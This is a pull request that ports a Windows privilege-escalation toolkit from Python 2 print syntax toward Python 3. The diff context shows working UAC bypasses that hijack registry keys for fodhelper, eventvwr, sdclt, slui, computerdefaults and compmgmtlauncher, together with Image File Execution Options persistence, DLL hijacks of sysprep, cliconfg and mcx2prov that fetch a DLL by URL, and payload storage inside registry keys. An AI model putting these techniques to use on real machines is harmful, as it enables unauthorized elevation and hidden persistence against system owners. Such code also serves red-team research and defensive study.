### PR TITLE
Modernize Python 2 code to get ready for Python 3

### DIFF
--- a/cliconfig_dll_hijack.py
+++ b/cliconfig_dll_hijack.py
@@ -16,6 +16,7 @@ if fail, we attempt to use makecab and wusa to copy our dll. After
 the copy is done, we execute the executable and enjoys the elevated
 access
 """
+from __future__ import print_function
 import os
 import sys
 import requests
@@ -46,7 +47,7 @@ def cliconfig_dll_hijack(url):
 						except Exception as error:
 							return False
 						try:
-							print os.remove("NTWDBLIB.tmp")
+							print(os.remove("NTWDBLIB.tmp"))
 						except Exception as error:
 							return False	
 						try:

--- a/compmgmtlauncher.py
+++ b/compmgmtlauncher.py
@@ -2,6 +2,7 @@
 Works from: Windows 7 (7600)
 Fixed in: Windows 10 RS2 (15031)
 """
+from __future__ import print_function
 import os
 import wmi
 import time
@@ -27,7 +28,7 @@ def warningBox():
 	return (Fore.YELLOW + '[!]' + Fore.RESET)
 
 def compmgmtlauncher():
-	print " {} compmgmtlauncher: Attempting to create registry key".format(infoBox())
+	print(" {} compmgmtlauncher: Attempting to create registry key".format(infoBox()))
 	try:
 		key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER,
 					os.path.join("Software\Classes\mscfile\shell\open\command"))
@@ -38,34 +39,34 @@ def compmgmtlauncher():
 				_winreg.REG_SZ,
 				payload)
 		_winreg.CloseKey(key)
-		print " {} compmgmtlauncher: Registry key created".format(successBox())
+		print(" {} compmgmtlauncher: Registry key created".format(successBox()))
 	except Exception as error:
-		print " {} compmgmtlauncher: Unable to create key".format(errorBox())
+		print(" {} compmgmtlauncher: Unable to create key".format(errorBox()))
 		return False
 
-	print " {} compmgmtlauncher: Pausing for 5 seconds before executing".format(infoBox())	
+	print(" {} compmgmtlauncher: Pausing for 5 seconds before executing".format(infoBox()))	
 	time.sleep(5)
 		
-	print " {} compmgmtlauncher: Attempting to create process".format(infoBox())
+	print(" {} compmgmtlauncher: Attempting to create process".format(infoBox()))
 	try:
 		result = wmi.Win32_Process.Create(CommandLine="cmd.exe /c start CompMgmtLauncher.exe",
 						ProcessStartupInformation=wmi.Win32_ProcessStartup.new(ShowWindow=win32con.SW_SHOWNORMAL))
 		if (result[1] == 0):
-			print " {} compmgmtlauncher: Process started successfully".format(successBox())
+			print(" {} compmgmtlauncher: Process started successfully".format(successBox()))
 		else:
-			print " {} compmgmtlauncher: Problem creating process".format(errorBox())
+			print(" {} compmgmtlauncher: Problem creating process".format(errorBox()))
 	except Exception as error:
-		print " {} compmgmtlauncher: Problem creating process".format(errorBox())
+		print(" {} compmgmtlauncher: Problem creating process".format(errorBox()))
 		return False
 
-	print " {} compmgmtlauncher: Pausing for 5 seconds before cleaning".format(infoBox())	
+	print(" {} compmgmtlauncher: Pausing for 5 seconds before cleaning".format(infoBox()))	
 	time.sleep(5)
 
-	print " {} compmgmtlauncher: Attempting to remove registry key".format(infoBox())
+	print(" {} compmgmtlauncher: Attempting to remove registry key".format(infoBox()))
 	try:
 		_winreg.DeleteKey(_winreg.HKEY_CURRENT_USER,
 				os.path.join("Software\Classes\mscfile\shell\open\command"))
-		print " {} compmgmtlauncher: Registry key was deleted".format(successBox())
+		print(" {} compmgmtlauncher: Registry key was deleted".format(successBox()))
 	except Exception as error:
-		print " {} compmgmtlauncher: Unable to delete key".format(errorBox())
+		print(" {} compmgmtlauncher: Unable to delete key".format(errorBox()))
 		return False

--- a/computerdefaults.py
+++ b/computerdefaults.py
@@ -2,6 +2,7 @@
 Works from: Windows 10 TH1 (10240)
 Fixed in: unfixed 
 """
+from __future__ import print_function
 import os
 import wmi
 import time
@@ -27,7 +28,7 @@ def warningBox():
 	return (Fore.YELLOW + '[!]' + Fore.RESET)
 
 def computerdefaults():
-	print " {} computerdefaults: Attempting to create registry key".format(infoBox())
+	print(" {} computerdefaults: Attempting to create registry key".format(infoBox()))
 	try:
 		key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER,
 					os.path.join("Software\Classes\ms-settings\shell\open\command"))
@@ -45,34 +46,34 @@ def computerdefaults():
 				None)
 
 		_winreg.CloseKey(key)
-		print " {} computerdefaults: Registry key created".format(successBox())
+		print(" {} computerdefaults: Registry key created".format(successBox()))
 	except Exception as error:
-		print " {} computerdefaults: Unable to create key".format(errorBox())
+		print(" {} computerdefaults: Unable to create key".format(errorBox()))
 		return False
 
-	print " {} computerdefaults: Pausing for 5 seconds before executing".format(infoBox())	
+	print(" {} computerdefaults: Pausing for 5 seconds before executing".format(infoBox()))	
 	time.sleep(5)
 		
-	print " {} computerdefaults: Attempting to create process".format(infoBox())
+	print(" {} computerdefaults: Attempting to create process".format(infoBox()))
 	try:
 		result = wmi.Win32_Process.Create(CommandLine="cmd.exe /c start computerdefaults.exe",
 						ProcessStartupInformation=wmi.Win32_ProcessStartup.new(ShowWindow=win32con.SW_SHOWNORMAL))
 		if (result[1] == 0):
-			print " {} computerdefaults: Process started successfully".format(successBox())
+			print(" {} computerdefaults: Process started successfully".format(successBox()))
 		else:
-			print " {} computerdefaults: Problem creating process".format(errorBox())
+			print(" {} computerdefaults: Problem creating process".format(errorBox()))
 	except Exception as error:
-		print " {} computerdefaults: Problem creating process".format(errorBox())
+		print(" {} computerdefaults: Problem creating process".format(errorBox()))
 		return False
 
-	print " {} computerdefaults: Pausing for 5 seconds before cleaning".format(infoBox())	
+	print(" {} computerdefaults: Pausing for 5 seconds before cleaning".format(infoBox()))	
 	time.sleep(5)
 
-	print " {} computerdefaults: Attempting to remove registry key".format(infoBox())
+	print(" {} computerdefaults: Attempting to remove registry key".format(infoBox()))
 	try:
 		_winreg.DeleteKey(_winreg.HKEY_CURRENT_USER,
 				os.path.join("Software\Classes\ms-settings\shell\open\command"))
-		print " {} computerdefaults: Registry key was deleted".format(successBox())
+		print(" {} computerdefaults: Registry key was deleted".format(successBox()))
 	except Exception as error:
-		print " {} computerdefaults: Unable to delete key".format(errorBox())
+		print(" {} computerdefaults: Unable to delete key".format(errorBox()))
 		return False	

--- a/eventviewer.py
+++ b/eventviewer.py
@@ -2,6 +2,7 @@
 Works from: Windows 7 (7600)
 Fixed in: Windows 10 RS2 (15031)
 """
+from __future__ import print_function
 import os
 import wmi
 import time
@@ -27,7 +28,7 @@ def warningBox():
 	return (Fore.YELLOW + '[!]' + Fore.RESET)
 
 def eventvwr():
-	print " {} eventvwr: Attempting to create registry key".format(infoBox())
+	print(" {} eventvwr: Attempting to create registry key".format(infoBox()))
 	try:
 		key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER,
 					os.path.join("Software\Classes\mscfile\shell\open\command"))
@@ -38,35 +39,35 @@ def eventvwr():
 				_winreg.REG_SZ,
 				payload)
 		_winreg.CloseKey(key)
-		print " {} eventvwr: Registry key created".format(successBox())
+		print(" {} eventvwr: Registry key created".format(successBox()))
 	except Exception as error:
-		print " {} eventvwr: Unable to create key".format(errorBox())
+		print(" {} eventvwr: Unable to create key".format(errorBox()))
 		return False
 
-	print " {} eventvwr: Pausing for 5 seconds before executing".format(infoBox())	
+	print(" {} eventvwr: Pausing for 5 seconds before executing".format(infoBox()))	
 	time.sleep(5)
 		
-	print " {} eventvwr: Attempting to create process".format(infoBox())
+	print(" {} eventvwr: Attempting to create process".format(infoBox()))
 	try:
 		result = wmi.Win32_Process.Create(CommandLine="cmd.exe /c start eventvwr.exe",
 						ProcessStartupInformation=wmi.Win32_ProcessStartup.new(ShowWindow=win32con.SW_SHOWNORMAL))
 		if (result[1] == 0):
-			print " {} eventvwr: Process started successfully".format(successBox())
+			print(" {} eventvwr: Process started successfully".format(successBox()))
 		else:
-			print " {} eventvwr: Problem creating process".format(errorBox())
+			print(" {} eventvwr: Problem creating process".format(errorBox()))
 	except Exception as error:
-		print " {} eventvwr: Problem creating process".format(errorBox())
+		print(" {} eventvwr: Problem creating process".format(errorBox()))
 		return False
 
-	print " {} eventvwr: Pausing for 5 seconds before cleaning".format(infoBox())	
+	print(" {} eventvwr: Pausing for 5 seconds before cleaning".format(infoBox()))	
 	time.sleep(5)
 
-	print " {} eventvwr: Attempting to remove registry key".format(infoBox())
+	print(" {} eventvwr: Attempting to remove registry key".format(infoBox()))
 	try:
 		_winreg.DeleteKey(_winreg.HKEY_CURRENT_USER,
 				os.path.join("Software\Classes\mscfile"))
-		print " {} eventvwr: Registry key was deleted".format(successBox())
+		print(" {} eventvwr: Registry key was deleted".format(successBox()))
 	except Exception as error:
-		print " {} eventvwr: Unable to delete key".format(errorBox())
+		print(" {} eventvwr: Unable to delete key".format(errorBox()))
 		return False
 

--- a/fodhelper.py
+++ b/fodhelper.py
@@ -2,6 +2,7 @@
 Works from: Windows 10 TH1 (10240)
 Fixed in: unfixed
 """
+from __future__ import print_function
 import os
 import wmi
 import time
@@ -27,7 +28,7 @@ def warningBox():
 	return (Fore.YELLOW + '[!]' + Fore.RESET)
 
 def fodhelper():
-	print " {} fodhelper: Attempting to create registry key".format(infoBox())
+	print(" {} fodhelper: Attempting to create registry key".format(infoBox()))
 	try:
 		key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER,
 					os.path.join("Software\Classes\ms-settings\shell\open\command"))
@@ -45,34 +46,34 @@ def fodhelper():
 				None)
 
 		_winreg.CloseKey(key)
-		print " {} fodhelper: Registry key created".format(successBox())
+		print(" {} fodhelper: Registry key created".format(successBox()))
 	except Exception as error:
-		print " {} fodhelper: Unable to create key".format(errorBox())
+		print(" {} fodhelper: Unable to create key".format(errorBox()))
 		return False
 
-	print " {} fodhelper: Pausing for 5 seconds before executing".format(infoBox())	
+	print(" {} fodhelper: Pausing for 5 seconds before executing".format(infoBox()))	
 	time.sleep(5)
 
-	print " {} fodhelper: Attempting to create process".format(infoBox())
+	print(" {} fodhelper: Attempting to create process".format(infoBox()))
 	try:
 		result = wmi.Win32_Process.Create(CommandLine="cmd.exe /c start fodhelper.exe",
 						ProcessStartupInformation=wmi.Win32_ProcessStartup.new(ShowWindow=win32con.SW_SHOWNORMAL))
 		if (result[1] == 0):
-			print " {} fodhelper: Process started successfully".format(successBox())
+			print(" {} fodhelper: Process started successfully".format(successBox()))
 		else:
-			print " {} fodhelper: Problem creating process".format(errorBox())
+			print(" {} fodhelper: Problem creating process".format(errorBox()))
 	except Exception as error:
-		print " {} fodhelper: Problem creating process".format(errorBox())
+		print(" {} fodhelper: Problem creating process".format(errorBox()))
 		return False
 
-	print " {} fodhelper: Pausing for 5 seconds before cleaning".format(infoBox())	
+	print(" {} fodhelper: Pausing for 5 seconds before cleaning".format(infoBox()))	
 	time.sleep(5)
 
-	print " {} fodhelper: Attempting to remove registry key".format(infoBox())
+	print(" {} fodhelper: Attempting to remove registry key".format(infoBox()))
 	try:
 		_winreg.DeleteKey(_winreg.HKEY_CURRENT_USER,
 							os.path.join("Software\Classes\ms-settings\shell\open\command"))
-		print " {} fodhelper: Registry key was deleted".format(successBox())
+		print(" {} fodhelper: Registry key was deleted".format(successBox()))
 	except Exception as error:
-		print " {} fodhelper: Unable to delete key".format(errorBox())
+		print(" {} fodhelper: Unable to delete key".format(errorBox()))
 		return False

--- a/image_file_execution.py
+++ b/image_file_execution.py
@@ -2,6 +2,7 @@
 Works from: Windows 7
 Fixed in: unfixed
 """
+from __future__ import print_function
 import os
 import _winreg
 from colorama import init, Fore
@@ -22,7 +23,7 @@ def warningBox():
 	return (Fore.YELLOW + '[!]' + Fore.RESET)
 
 def ifeo(processname):
-	print " {} ifeo: Attempting to create registry key".format(infoBox())
+	print(" {} ifeo: Attempting to create registry key".format(infoBox()))
 	try:
 		key = _winreg.CreateKey(_winreg.HKEY_LOCAL_MACHINE,
 					os.path.join("Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options",
@@ -33,7 +34,7 @@ def ifeo(processname):
 				_winreg.REG_SZ,
 				payload)
 		_winreg.CloseKey(key)
-		print " {} ifeo: Registry key created".format(successBox())
+		print(" {} ifeo: Registry key created".format(successBox()))
 	except Exception as error:
-		print " {} ifeo: Unable to create registry key".format(errorBox())
+		print(" {} ifeo: Unable to create registry key".format(errorBox()))
 		return False

--- a/look_for_autoelevated_apps.py
+++ b/look_for_autoelevated_apps.py
@@ -5,6 +5,7 @@ by searching for strings in binary data:
 * <autoElevate>true</autoElevate>
 * <autoElevate xmlns=\"http://schemas.microsoft.com/SMI/2005/WindowsSettings\">true</autoElevate>
 """
+from __future__ import print_function
 import os
 from colorama import init, Fore
 init(convert=True)
@@ -39,7 +40,7 @@ def parse_manifests(path):
 				if ("<autoElevate xmlns=\"http://schemas.microsoft.com/SMI/2005/WindowsSettings\">true</autoElevate>" in manifest):
 					process_list.append(os.path.join(path,file))
 	
-	print " {} Listing processes:".format(infoBox())
+	print(" {} Listing processes:".format(infoBox()))
 	for process in process_list:
-		print " {} {}".format(successBox(),process)
+		print(" {} {}".format(successBox(),process))
 	return process_list

--- a/mcx2prov_dll_hijack.py
+++ b/mcx2prov_dll_hijack.py
@@ -16,6 +16,7 @@ if fail, we attempt to use makecab and wusa to copy our dll. After
 the copy is done, we execute the executable and enjoys the elevated
 access
 """
+from __future__ import print_function
 import os
 import sys
 import requests
@@ -46,7 +47,7 @@ def mcx2prov_dll_hijack(url):
 						except Exception as error:
 							return False
 						try:
-							print os.remove("CRYPTBASE.tmp")
+							print(os.remove("CRYPTBASE.tmp"))
 						except Exception as error:
 							return False	
 						try:

--- a/registry_storage.py
+++ b/registry_storage.py
@@ -2,6 +2,7 @@
 Works from: Windows XP
 Fixed in: unfixed
 """
+from __future__ import print_function
 import os
 import _winreg
 from colorama import init, Fore
@@ -20,32 +21,32 @@ def warningBox():
 	return (Fore.YELLOW + '[!]' + Fore.RESET)
 
 def reader(file_path):
-	print " {} storage: Checking file size".format(infoBox())
+	print(" {} storage: Checking file size".format(infoBox()))
 	if (os.path.getsize(file_path) < 1000000):
-		print " {} storage: Reading binary data: {}".format(infoBox(),file_path) 
+		print(" {} storage: Reading binary data: {}".format(infoBox(),file_path)) 
 		try:
 			file = open(file_path, "rb")
 			return file.read()
-			print " {} storage: Successfully read binary data".format(successBox())
+			print(" {} storage: Successfully read binary data".format(successBox()))
 		except Exception as error:
-			print " {} storage: Unable to read binary data".format(errorBox())
+			print(" {} storage: Unable to read binary data".format(errorBox()))
 			return False
 	else:
-		print " {} storage: File size error".format(errorBox())
+		print(" {} storage: File size error".format(errorBox()))
 		return False
 
 def storage_delete():
-	print " {} storage: Attempting to delete registry key".format(infoBox())
+	print(" {} storage: Attempting to delete registry key".format(infoBox()))
 	try:
 		_winreg.DeleteKey(_winreg.HKEY_CURRENT_USER,
 				os.path.join("Software\Classes\.storage\container"))
-		print " {} storage: Registry key deleted".format(successBox())
+		print(" {} storage: Registry key deleted".format(successBox()))
 	except Exception as error:
-		print " {} storage: Unable to delete registry key".format(errorBox())
+		print(" {} storage: Unable to delete registry key".format(errorBox()))
 		return False
 		
 def storage_save_to_disk(file_path):
-	print " {} storage: Attempting to read binary data from the registry key".format(infoBox())
+	print(" {} storage: Attempting to read binary data from the registry key".format(infoBox()))
 	try:
 		key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER,
 					os.path.join("Software\Classes\.storage\container"),
@@ -54,23 +55,23 @@ def storage_save_to_disk(file_path):
 
 		data = _winreg.QueryValueEx(key,None)
 		_winreg.CloseKey(key)
-		print " {} storage: Successfully read binary data".format(successBox())
+		print(" {} storage: Successfully read binary data".format(successBox()))
 	except Exception as error:
-		print " {} storage: Unable to read binary data from the registry".format(errorBox())
+		print(" {} storage: Unable to read binary data from the registry".format(errorBox()))
 		return False
 
-	print " {} storage: Attempting to save file to disk: {}".format(infoBox(),file_path)
+	print(" {} storage: Attempting to save file to disk: {}".format(infoBox(),file_path))
 	try:
 		file = open(file_path,"wb")
 		file.write(data[0])
 		file.close()
-		print " {} storage: File saved to disk: {}".format(successBox(),file_path)
+		print(" {} storage: File saved to disk: {}".format(successBox(),file_path))
 	except Exception as error:
-		print " {} storage: Unable to save file on disk".format(errorBox())
+		print(" {} storage: Unable to save file on disk".format(errorBox()))
 		return False
 
 def storage_save_to_reg(file_path):
-	print " {} storage: Attempting to store binary data inside a registry key".format(infoBox())
+	print(" {} storage: Attempting to store binary data inside a registry key".format(infoBox()))
 	try:
 		key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER,
 					os.path.join("Software\Classes\.storage\container"))
@@ -81,13 +82,13 @@ def storage_save_to_reg(file_path):
 				_winreg.REG_BINARY,
 				reader(file_path))
 		_winreg.CloseKey(key)
-		print " {} storage: Registry key created containing our binary data".format(successBox())
+		print(" {} storage: Registry key created containing our binary data".format(successBox()))
 	except Exception as error:
-		print " {} storage: Unable to store binary data inside the registry key".format(errorBox())
+		print(" {} storage: Unable to store binary data inside the registry key".format(errorBox()))
 		return False
 		
 def storage_list():
-	print " {} storage: Listing available binary data".format(infoBox())
+	print(" {} storage: Listing available binary data".format(infoBox()))
 	try:
 		key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER,
 							os.path.join("Software\Classes\.storage\container"),
@@ -96,7 +97,7 @@ def storage_list():
 
 		data = _winreg.QueryValueEx(key,None)
 		_winreg.CloseKey(key)
-		print " {} storage: {}".format(successBox(),data[0])
+		print(" {} storage: {}".format(successBox(),data[0]))
 	except Exception as error:
-		print " {} storage: Unable to list binary data".format(errorBox())
+		print(" {} storage: Unable to list binary data".format(errorBox()))
 		return False

--- a/sdclt_control.py
+++ b/sdclt_control.py
@@ -2,6 +2,7 @@
 Works from: Windows 10 TH1 (10240)
 Fixed in: Windows 10 RS3 (16215)
 """
+from __future__ import print_function
 import os
 import wmi
 import time
@@ -27,7 +28,7 @@ def warningBox():
 	return (Fore.YELLOW + '[!]' + Fore.RESET)
 
 def sdclt_control():
-		print " {} sdclt_control: Attempting to create registry key".format(infoBox())
+		print(" {} sdclt_control: Attempting to create registry key".format(infoBox()))
 		try:
 			key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER,
 						os.path.join("Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe"))
@@ -38,34 +39,34 @@ def sdclt_control():
 					_winreg.REG_SZ,
 					payload)
 			_winreg.CloseKey(key)
-			print " {} sdclt_control: Registry key created".format(successBox())
+			print(" {} sdclt_control: Registry key created".format(successBox()))
 		except Exception as error:
-			print " {} sdclt_control: Unable to create key".format(errorBox())
+			print(" {} sdclt_control: Unable to create key".format(errorBox()))
 			return False
 
-		print " {} sdclt_control: Pausing for 5 seconds before executing".format(infoBox())
+		print(" {} sdclt_control: Pausing for 5 seconds before executing".format(infoBox()))
 		time.sleep(5)
 		
-		print " {} sdclt_control: Attempting to create process".format(infoBox())
+		print(" {} sdclt_control: Attempting to create process".format(infoBox()))
 		try:
 			result = wmi.Win32_Process.Create(CommandLine="cmd.exe /c start sdclt.exe",
 							ProcessStartupInformation=wmi.Win32_ProcessStartup.new(ShowWindow=win32con.SW_SHOWNORMAL))
 			if (result[1] == 0):
-				print " {} sdclt_control: Process started successfully".format(successBox())
+				print(" {} sdclt_control: Process started successfully".format(successBox()))
 			else:
-				print " {} sdclt_control: Problem creating process".format(errorBox())
+				print(" {} sdclt_control: Problem creating process".format(errorBox()))
 		except Exception as error:
-			print " {} sdclt_control: Problem creating process".format(errorBox())
+			print(" {} sdclt_control: Problem creating process".format(errorBox()))
 			return True
 
-		print " {} sdclt_control: Pausing for 5 seconds before cleaning".format(infoBox())
+		print(" {} sdclt_control: Pausing for 5 seconds before cleaning".format(infoBox()))
 		time.sleep(5)
 		
-		print " {} sdclt_control: Attempting to remove registry key".format(infoBox())
+		print(" {} sdclt_control: Attempting to remove registry key".format(infoBox()))
 		try:
 			_winreg.DeleteKey(_winreg.HKEY_CURRENT_USER,
 					os.path.join("Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe"))
-			print " {} sdclt_control: Registry key was deleted".format(successBox())
+			print(" {} sdclt_control: Registry key was deleted".format(successBox()))
 		except Exception as error:
-			print " {} sdclt_control: Unable to delete key".format(errorBox())
+			print(" {} sdclt_control: Unable to delete key".format(errorBox()))
 			return False

--- a/sdclt_isolatedcommand.py
+++ b/sdclt_isolatedcommand.py
@@ -2,6 +2,7 @@
 Works from: Windows 10 TH1 (10240)
 Fixed in: Windows 10 RS4 (17025)
 """
+from __future__ import print_function
 import os
 import wmi
 import time
@@ -27,7 +28,7 @@ def warningBox():
 	return (Fore.YELLOW + '[!]' + Fore.RESET)
 
 def sdclt_isolatedcommand():
-	print " {} sdclt_isolatedcommand: Attempting to create registry key".format(infoBox())
+	print(" {} sdclt_isolatedcommand: Attempting to create registry key".format(infoBox()))
 	try:
 		key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER,
 					os.path.join("Software\Classes\exefile\shell\runas\command"))					
@@ -37,33 +38,33 @@ def sdclt_isolatedcommand():
 				_winreg.REG_SZ,
 				payload)
 		_winreg.CloseKey(key)
-		print " {} sdclt_isolatedcommand: Registry key created".format(successBox())
+		print(" {} sdclt_isolatedcommand: Registry key created".format(successBox()))
 	except Exception as error:
-		print " {} sdclt_isolatedcommand: Unable to create key".format(errorBox())
+		print(" {} sdclt_isolatedcommand: Unable to create key".format(errorBox()))
 		return False
 
-	print " {} sdclt_isolatedcommand: Pausing for 5 seconds before executing".format(infoBox())
+	print(" {} sdclt_isolatedcommand: Pausing for 5 seconds before executing".format(infoBox()))
 	time.sleep(5)
 	
-	print " {} sdclt_isolatedcommand: Attempting to create process".format(infoBox())
+	print(" {} sdclt_isolatedcommand: Attempting to create process".format(infoBox()))
 	try:
 		result = wmi.Win32_Process.Create(CommandLine="cmd.exe /c sdclt.exe /kickoffelev",
 						ProcessStartupInformation=wmi.Win32_ProcessStartup.new(ShowWindow=win32con.SW_SHOWNORMAL))
 		if (result[1] == 0):
-			print " {} sdclt_isolatedcommand: Process started successfully".format(successBox())
+			print(" {} sdclt_isolatedcommand: Process started successfully".format(successBox()))
 		else:
-			print " {} sdclt_isolatedcommand: Problem creating process".format(errorBox())
+			print(" {} sdclt_isolatedcommand: Problem creating process".format(errorBox()))
 	except Exception as error:
-		print " {} sdclt_isolatedcommand: Problem creating process".format(errorBox())
+		print(" {} sdclt_isolatedcommand: Problem creating process".format(errorBox()))
 		return False
 
-	print " {} sdclt_isolatedcommand: Pausing for 5 seconds before cleaning".format(infoBox())
+	print(" {} sdclt_isolatedcommand: Pausing for 5 seconds before cleaning".format(infoBox()))
 	time.sleep(5)
 		
 	try:
 		_winreg.DeleteKey(_winreg.HKEY_CURRENT_USER,
 				os.path.join("Software\Classes\exefile\shell\runas\command"))
-		print " {} sdclt_isolatedcommand: Registry key was deleted".format(successBox())
+		print(" {} sdclt_isolatedcommand: Registry key was deleted".format(successBox()))
 	except Exception as error:
-		print " {} sdclt_isolatedcommand: Unable to delete key".format(errorBox())
+		print(" {} sdclt_isolatedcommand: Unable to delete key".format(errorBox()))
 		return False

--- a/slui_file_hijack.py
+++ b/slui_file_hijack.py
@@ -2,6 +2,7 @@
 Works from: Windows 8.1 (9600)
 Fixed in: unfixed
 """
+from __future__ import print_function
 import os
 import wmi
 import time
@@ -27,7 +28,7 @@ def warningBox():
 	return (Fore.YELLOW + '[!]' + Fore.RESET)
 
 def slui():
-	print " {} slui: Attempting to create registry key".format(infoBox())
+	print(" {} slui: Attempting to create registry key".format(infoBox()))
 	try:
 		key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER,
 					os.path.join("Software\Classes\exefile\shell\open\command"))
@@ -45,34 +46,34 @@ def slui():
 				None)
 
 		_winreg.CloseKey(key)
-		print " {} slui: Registry key created".format(successBox())
+		print(" {} slui: Registry key created".format(successBox()))
 	except Exception as error:
-		print " {} slui: Unable to create key".format(errorBox())
+		print(" {} slui: Unable to create key".format(errorBox()))
 		return False
 
-	print " {} slui: Pausing for 5 seconds before executing".format(infoBox())
+	print(" {} slui: Pausing for 5 seconds before executing".format(infoBox()))
 	time.sleep(5)
 
-	print " {} slui: Attempting to create process".format(infoBox())
+	print(" {} slui: Attempting to create process".format(infoBox()))
 	try:
 		result = wmi.Win32_Process.Create(CommandLine="cmd.exe /c start slui.exe",
 						ProcessStartupInformation=wmi.Win32_ProcessStartup.new(ShowWindow=win32con.SW_SHOWNORMAL))
 		if (result[1] == 0):
-			print " {} slui: Process started successfully".format(successBox())
+			print(" {} slui: Process started successfully".format(successBox()))
 		else:
-			print " {} slui: Problem creating process".format(errorBox())
+			print(" {} slui: Problem creating process".format(errorBox()))
 	except Exception as error:
-		print " {} slui: Problem creating process".format(errorBox())
+		print(" {} slui: Problem creating process".format(errorBox()))
 		return False
 
-	print " {} slui: Pausing for 5 seconds before cleaning".format(infoBox())
+	print(" {} slui: Pausing for 5 seconds before cleaning".format(infoBox()))
 	time.sleep(5)
 
-	print " {} slui: Attempting to remove registry key".format(infoBox())
+	print(" {} slui: Attempting to remove registry key".format(infoBox()))
 	try:
 		_winreg.DeleteKey(_winreg.HKEY_CURRENT_USER,
 				os.path.join("Software\Classes\exefile\shell\open\command"))
-		print " {} slui: Registry key was deleted".format(successBox())					
+		print(" {} slui: Registry key was deleted".format(successBox()))					
 	except Exception as error:
-		print " {} slui: Unable to delete key".format(errorBox())
+		print(" {} slui: Unable to delete key".format(errorBox()))
 		return False

--- a/sysprep_dll_hijack.py
+++ b/sysprep_dll_hijack.py
@@ -20,6 +20,7 @@ if fail, we attempt to use makecab and wusa to copy our dll. After
 the copy is done, we execute the executable and enjoys the elevated
 access
 """
+from __future__ import print_function
 import os
 import sys
 import requests
@@ -50,7 +51,7 @@ def sysprep_dll_hijack(url):
 						except Exception as error:
 							return False
 						try:
-							print os.remove("CRYPTBASE.tmp")
+							print(os.remove("CRYPTBASE.tmp"))
 						except Exception as error:
 							return False	
 						try:


### PR DESCRIPTION
See #2  Some minimal, "safe" changes to make the code syntax compatible with both Python 2 and Python 3.
* Run __futurize --stage1__ http://python-future.org/futurize_cheatsheet.html

Python 3 syntax compatibility does __not__ mean that the port is complete.  More work will be require to complete the port to Python 3.
* Not yet fixed in 3 files: __python3 -c "'\UserInit'"__  # --> SyntaxError: (unicode error)

$ __flake8 . --count --show-source --statistics --select=E901,E999,F821,F822,F823__
```
./registry_persistence.py:35:11: E999 SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 19-20: truncated \uXXXX escape
	payload = "c:\windows\system32\userinit.exe,{}".format(executable)
          ^
./cliconfig_dll_hijack.py:18:0: E999 SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 162-163: malformed \N character escape
"""
^
./sysprep_dll_hijack.py:22:0: E999 SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 280-281: truncated \UXXXXXXXX escape
"""
^
3     E999 SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 162-163: malformed \N character escape
3
```